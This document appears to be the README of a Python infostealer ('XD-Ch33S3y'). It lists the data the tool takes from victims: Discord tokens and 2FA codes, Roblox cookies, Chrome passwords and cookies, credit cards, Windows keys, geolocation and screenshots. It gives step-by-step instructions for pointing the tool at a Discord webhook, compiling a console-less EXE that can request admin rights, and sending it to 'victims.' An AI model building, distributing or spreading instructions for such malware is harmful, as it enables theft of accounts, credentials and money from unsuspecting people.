NOTE: This is a free software. It will not be undetected from antivirus software, or have custom features. Remember, this is 100% free. If you want a better one, join CheatAway and purchase one.
XD-Ch33S3y
- User Name
- Computer Name
- Windows Product Key & Build Info
- Pretty Fast Even if it Was Made With Python
- IP & Geolocation. (Country, City, Google Maps Location)
- A screenshot of all their monitors
- Roblox Cookies
- All valid/working discord tokens. (Bypasses BetterDiscord, Token Protector and Discord's new encryption)
- Discord 2FA Codes for accounts with 2FA enabled
- Their Passwords & Credit Cards for Discord (updates when they change it)
- All Passwords and Cookies from the Chrome Browser
The webhook notification looks like this:
- Install python if you have not already. (Link Here)
- Open up main.py with notepad or some other editor
- Locate the config at the top of the file and Replace "WEBHOOK_HERE" with a discord webhook you've created. (Keep the quotes around the webhook)
- Double Click
setup.bat
and allow it to finish. - A Window will open prompting for a name. Put something in such as "Token_Logger" (You can always rename the file later)
- Send the file to victims. 😈
If you do not want to use the batch file, you can follow this guide:
- Open command prompt in the same directory as the .py file.
- Type
pip install -r requirements.txt
(To install the modules) - Type:
pyinstaller --clean --onefile --noconsole -i NONE main.py
, you will see a lot of text popping up. Ignore it and wait. - After it says its finishing, you can find the EXE file in the dist directory, located in the project root!
Add these into the command when creating the exe if you want
PyInstaller Options |
---|
-n name The name of the compiled EXE (Defaults to the name of the original .py file) |
-i icon.ico The icon. You can specify a directory to an icon file, or do NONE for a default EXE icon. |
--clean Removes all temporary files so you only have what you need. |
--uac-admin Modified the MANIFEST so that it will request UAC permissions upon running. |
--hidden-import MODULENAME Adds a module without it being present in the script. |